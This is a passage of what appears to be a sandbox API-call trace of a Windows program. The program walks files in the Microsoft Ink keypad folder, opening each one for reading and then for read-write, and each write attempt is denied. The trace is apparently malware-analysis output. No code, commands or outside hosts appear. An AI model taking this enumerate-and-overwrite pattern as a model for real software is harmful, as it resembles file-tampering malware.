Size=0x14) returned 0x35190 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0099.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0099.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0099.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0099.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0099.306] AreFileApisANSI () returned 1 [0099.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpUsedDefaultChar=0x0) returned 79 [0099.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.306] AreFileApisANSI () returned 1 [0099.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8d2c8 [0099.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8d2c8, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 79 [0099.306] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.307] GetFileType (hFile=0x27c) returned 0x1 [0099.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0099.307] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.307] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.307] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.307] CloseHandle (hObject=0x27c) returned 1 [0099.307] AreFileApisANSI () returned 1 [0099.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8d220 [0099.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8d220, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 79 [0099.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.308] GetLastError () returned 0x5 [0099.308] GetLastError () returned 0x5 [0099.308] SetLastError (dwErrCode=0x5) [0099.308] GetLastError () returned 0x5 [0099.308] SetLastError (dwErrCode=0x5) [0099.308] GetLastError () returned 0x5 [0099.308] SetLastError (dwErrCode=0x5) [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.308] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.308] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.308] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="keypadbase.xml", cAlternateFileName="")) returned 1 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0099.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0099.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0099.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.309] AreFileApisANSI () returned 1 [0099.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpUsedDefaultChar=0x0) returned 87 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0099.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.309] AreFileApisANSI () returned 1 [0099.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0099.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81918 [0099.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x81918, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 87 [0099.309] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.310] GetFileType (hFile=0x27c) returned 0x1 [0099.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0099.310] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.310] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.310] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.310] CloseHandle (hObject=0x27c) returned 1 [0099.310] AreFileApisANSI () returned 1 [0099.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81638 [0099.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x81638, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 87 [0099.311] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.311] GetLastError () returned 0x5 [0099.311] GetLastError () returned 0x5 [0099.311] SetLastError (dwErrCode=0x5) [0099.311] GetLastError () returned 0x5 [0099.311] SetLastError (dwErrCode=0x5) [0099.311] GetLastError () returned 0x5 [0099.311] SetLastError (dwErrCode=0x5) [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0099.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.311] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="kor-kor.xml", cAlternateFileName="")) returned 1 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0099.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81358 [0099.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0099.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.312] AreFileApisANSI () returned 1 [0099.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpUsedDefaultChar=0x0) returned 84 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0099.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.312] AreFileApisANSI () returned 1 [0099.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f2c8 [0099.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 84 [0099.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.313] GetFileType (hFile=0x27c) returned 0x1 [0099.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.313] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.313] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.313] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.313] CloseHandle (hObject=0x27c) returned 1 [0099.313] AreFileApisANSI () returned 1 [0099.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x60348 [0099.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x60348, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 84 [0099.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.314] GetLastError () returned 0x5 [0099.314] GetLastError () returned 0x5 [0099.314] SetLastError (dwErrCode=0x5) [0099.314] GetLastError () returned 0x5 [0099.314] SetLastError (dwErrCode=0x5) [0099.314] GetLastError () returned 0x5 [0099.314] SetLastError (dwErrCode=0x5) [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0099.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.314] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xa6, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x814d0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xa6, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ƈ")) returned 0 [0099.314] FindClose (in: hFindFile=0x77f90 | out: hFindFile=0x77f90) returned 1 [0099.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.315] 